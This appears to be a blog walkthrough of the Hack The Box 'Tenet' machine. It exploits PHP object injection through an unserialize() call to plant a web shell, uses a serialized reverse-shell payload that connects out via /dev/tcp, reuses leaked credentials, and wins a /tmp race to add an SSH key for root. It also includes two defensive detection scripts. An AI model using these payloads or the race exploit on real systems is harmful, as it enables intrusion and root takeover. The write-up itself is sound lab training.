# Tenet ~ Hack The Box

* * *

### Prerequisite

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985504128/c553fa82-46be-4df8-a5c8-515e88472428.jpeg)

Just to make life easier, I usually add an entry to my hosts file so the target machine can be reached by name.

    echo "10.10.10.223	tenet.htb" >> /etc/hosts

hosts file entry

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985505316/dc375918-5047-43b3-bb82-0a1752bf36c7.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an NMAP scan against the machine.

    nmap -Pn -sC -sV -oN initial tenet.htb

    Nmap scan report for tenet.htb (10.10.10.223)
    Host is up (0.0044s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
    |   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
    |_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-generator: WordPress 5.6
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Tenet
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

### Scanning & Enumeration

Based on the scan, I saw that port 80 was serving a web application. This is what it looked like:

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985506546/0357b531-8d91-426c-8645-435ed9217e62.png)

Just another default Apache2 web page.

However, I recalled the `nmap` scan showing a WordPress 5.6 banner, so I tried accessing the site by its hostname instead.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985507751/bd37e876-12a5-42c4-a7af-a70c9c805385.png)

As expected, there was a WordPress blog. Upon taking a closer look, I found a post on that blog with the following contents.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985508884/5c362494-6c44-4b6f-9198-aa772768409b.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985510112/fe942bfd-4ea6-49fd-bc33-5f9f4cba79fc.png)

I tried to access this `php` file in question but was unable to do so.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985511126/b4ceecc1-c994-4563-ae90-0aa359937a66.png)

So I decided to use the IP instead of the domain/host name.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985512187/b3595845-1a6a-4a3b-9732-1013628ed5f5.png)

To my surprise, I was able to trigger the file. Looking back at the comment, I realized that a backup of this file was mentioned. Thus, I decided to fuzz the URL for the backup file using a wordlist and `wfuzz`.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985513143/29711b21-274d-4fcd-9b32-5f6e98269b99.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985514254/e515f1d0-cdd9-463f-a934-fddfc8236fbb.png)

The `.bak` extension produced a different response, so I checked it out, and it was indeed the backup file mentioned in the comment.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985515482/a8e7db1c-481c-43c7-9a89-94ecee571062.png)

    <?php
    
    class DatabaseExport
    {
            public $user_file = 'users.txt';
            public $data = '';
    
            public function update_db()
            {
                    echo '[+] Grabbing users from text file <br>';
                    $this->data = 'Success';
            }
    
            // Runs when any DatabaseExport object is destroyed, including one built by
            // unserialize(), so attacker-controlled $user_file and $data reach
            // file_put_contents() unchecked.
            public function __destruct()
            {
                    file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
                    echo '[] Database updated <br>';
            //      echo 'Gotta get this working properly...';
            }
    }
    
    // The ?arepo= query parameter goes straight into unserialize(): this is the injection point.
    $input = $_GET['arepo'] ?? '';
    $databaseupdate = unserialize($input);
    
    $app = new DatabaseExport;
    $app->update_db();
    
    ?>

After analyzing the backup, I realized that it passes the `arepo` parameter straight to `unserialize()`, which makes it vulnerable to PHP object injection. [Here's](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) the document that I used to understand this vulnerability \[page 30 onwards\].

### Exploitation

I knew that the file took in a parameter called `arepo`. The goal was to craft a serialized object that writes a file to the target machine and lets me run arbitrary commands. Here's the payload that I came up with based on the document mentioned above.

    class DatabaseExport
    {
            public $user_file = 'exploittenet.php';
            public $data = '<?php echo exec("whoami");?>';
    }
    echo serialize(new DatabaseExport);

Next, I ran PHP in interactive mode and fed it this script, which printed the serialized object.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985516699/15012d3b-d7f5-4e08-b0cf-beb80144bed3.png)

    O:14:"DatabaseExport":2:{s:9:"user_file";s:16:"exploittenet.php";s:4:"data";s:28:"<?php echo exec("whoami");?>";}
    

I then URL-encoded this output with CyberChef.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985517728/7016a664-e26c-4a37-9fb1-f115aff916ad.png)

Lastly, I passed the encoded value in the `arepo` parameter and tested whether this PoC worked.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985518779/f3411e18-f60c-41a1-9c08-02f2de4e0337.png)

And that worked! I next constructed a similar payload for a reverse shell based on the PoC and opened up a netcat listener to catch the incoming shell.

    class DatabaseExport
    {
            public $user_file = 'neeshell.php';
            public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.51/666 0>&1\'"); ?>';
    }
    echo serialize(new DatabaseExport);

Exploit code for reverse shell

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985519949/0e395fca-88a7-4321-aa8d-60afe7267736.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985520934/03fa2774-f12b-4356-b191-465f06444ef7.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985521912/9449a083-7a97-438d-896c-5bc811d244e3.png)

And I now had a steady reverse shell connection from the target box!
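The same `arepo` request seen from the defender's side, as an added example that is not part of the original write-up: a small detector that URL-decodes query strings in Apache access-log lines and flags PHP-serialized objects (the `O:<len>:"Class":` form) and any embedded `<?php` tag. The log lines are constructed, the `/vulnerable.php` path is a placeholder since the write-up does not name the file in text, and the payload is the write-up's PoC URL-encoded.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log: client, ident, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A serialized PHP object begins with  O:<len>:"<ClassName>":<prop count>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"(?P<cls>[A-Za-z_\\][\w\\]*)":\d+:\{')
# The PoC smuggles a PHP web shell inside a serialized string property
PHP_TAG_RE = re.compile(r'<\?php', re.IGNORECASE)

def find_object_injection(line):
    """Return one finding per serialized object found in the request's query string."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # parse_qs URL-decodes values, so %3A/%22 become the ':' and '"' of the serialized form
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        for value in values:
            for obj in PHP_OBJECT_RE.finditer(value):
                findings.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "class": obj.group("cls"),
                    "embeds_php": bool(PHP_TAG_RE.search(value)),
                    "status": int(m.group("status")),
                })
    return findings

def scan(lines):
    """Run the detector over an iterable of access-log lines."""
    return [f for line in lines for f in find_object_injection(line)]

# Constructed sample log: a plain request, then the write-up's PoC payload, URL-encoded
SAMPLE_LOG = [
    '10.10.14.51 - - [09/Apr/2023:12:00:01 +0000] "GET /vulnerable.php HTTP/1.1" 200 64 "-" "curl/7.88"',
    '10.10.14.51 - - [09/Apr/2023:12:00:07 +0000] "GET /vulnerable.php?arepo=O%3A14%3A%22DatabaseExport%22'
    '%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A16%3A%22exploittenet.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28'
    '%3A%22%3C%3Fphp%20echo%20exec%28%22whoami%22%29%3B%3F%3E%22%3B%7D HTTP/1.1" 200 64 "-" "curl/7.88"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} sent serialized {f['class']} via {f['param']!r} (embedded PHP: {f['embeds_php']})")
```

A serialized array (`a:1:{...}`) in a parameter is not flagged; only objects can reach a magic method such as `__destruct`.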

### Lateral Movement

Enumerating around the box for a while led me to discover the `wordpress` directory, which was located in the html directory.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985523144/76161bce-b37a-4a89-8222-0ef56eba8bfd.png)

Looking further, I found a file named `wp-config.php`. In there were the credentials belonging to the user `neil`.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985524222/252b3688-6a63-4576-a0f6-49972eee289a.png)

    neil:Opera2112

Since SSH was running on the box, I was able to easily log in to `neil`'s account and grab the user.txt flag.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985525332/78e22994-3789-4413-9378-37d70dbc265e.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985526478/c00c1297-c8bf-4656-8302-c93dd58e8c14.png)

### Privilege Escalation

This last part required some custom bash scripting to overcome. Running `sudo -l` revealed that the `neil` user was allowed to run a bash script named `enableSSH.sh`.

    #!/bin/bash
    
    checkAdded() {
            sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
            if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
                    /bin/echo "Successfully added $sshName to authorized_keys file!"
            else
                    /bin/echo "Error in adding $sshName to authorized_keys file!"
            fi
    }
    
    checkFile() {
            if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
                    /bin/echo "Error in creating key file!"
                    if [[ -f $1 ]]; then /bin/rm $1; fi
                    exit 1
            fi
    }
    addKey() {
            tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
            (umask 110; touch $tmpName)
            /bin/echo $key >>$tmpName
            checkFile $tmpName
            /bin/cat $tmpName >>/root/.ssh/authorized_keys
            /bin/rm $tmpName
    }
    key="ssh-rsa AAAAA****TNN/w0p+Urjbl root@ubuntu"
    addKey
    checkAdded

This script adds a key to the `authorized_keys` file to allow SSH logins as root from a particular machine. However, there's a small loophole in the script. The public key is first written to a temporary file in `/tmp` before being appended to the actual `~/.ssh/authorized_keys` of root, and because the script creates that file under `umask 110` (which clears no write bits) it is writable by everyone. If I continuously overwrite every `ssh-*` file in `/tmp` with my machine's public key while the script runs, my key gets appended instead and I gain root access.

    #!/bin/bash
    date
    cd /tmp
    while true; do
            echo 'ssh-rsa AAAAB3Nz*****B8aLDra2Zg2CGmhH2flRKU=' | tee ssh-*
    done

Next, I ran this script and the `enableSSH.sh` script a couple of times.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985527473/f2607bb7-b452-4a6d-911d-ea80d06a7014.png)

After that, I tried to SSH into the root account from my machine and was successful!

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985528574/6bfd3684-7c5c-467b-9385-fdf66be770a9.png)

ROOTY!
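Why the race in `enableSSH.sh` exists, as an added example that is neither the write-up's nor the box's code: a small Python audit that computes the file mode a `touch` under the script's `umask 110` actually produces, and flags the other tell-tale patterns (`mktemp -u`, staging in a shared temp directory before appending to root's `authorized_keys`). The script excerpt it scans is constructed from the `addKey()` function above, with the key value omitted.

```python
import re

# Patterns matching the constructs used in the sudo script shown above (enableSSH.sh)
UMASK_RE = re.compile(r'\bumask\s+(?P<mask>[0-7]{3,4})\b')
MKTEMP_DRY_RUN_RE = re.compile(r'\bmktemp\b[^\n]*\s-u\b')
SHARED_TMP_RE = re.compile(r'/(?:tmp|var/tmp|dev/shm)/')
ROOT_KEYS_APPEND_RE = re.compile(r'>>\s*/root/\.ssh/authorized_keys')

def effective_mode(umask, base=0o666):
    """Mode a new regular file receives: touch/open request 0666, the umask clears bits."""
    return base & ~umask & 0o777

def world_writable(mode):
    return bool(mode & 0o002)

def audit_script(text):
    """Return plain-language findings about insecure temp-file handling in a shell script."""
    findings = []
    for m in UMASK_RE.finditer(text):
        mask = int(m.group("mask"), 8)
        mode = effective_mode(mask)
        if world_writable(mode):
            findings.append(f"umask {m.group('mask')}: new files get mode {mode:04o}, anyone can overwrite them")
    if MKTEMP_DRY_RUN_RE.search(text):
        findings.append("mktemp -u returns only a name; the file is created separately and unprotected")
    if SHARED_TMP_RE.search(text) and ROOT_KEYS_APPEND_RE.search(text):
        findings.append("content staged in a shared temp dir is appended to root's authorized_keys (TOCTOU)")
    return findings

# Constructed excerpt mirroring the write-up's addKey() function (key value omitted)
SAMPLE_SCRIPT = """\
addKey() {
        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
        (umask 110; touch $tmpName)
        /bin/echo $key >>$tmpName
        /bin/cat $tmpName >>/root/.ssh/authorized_keys
        /bin/rm $tmpName
}
"""

if __name__ == "__main__":
    for finding in audit_script(SAMPLE_SCRIPT):
        print("-", finding)
    print(f"with umask 077 the same touch would yield mode {effective_mode(0o077):04o}")
```

The fix the audit points at is to drop the temp file entirely and append `$key` directly, or at least use `umask 077` with `mktemp` (no `-u`) so the file is created with mode 0600 atomically.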
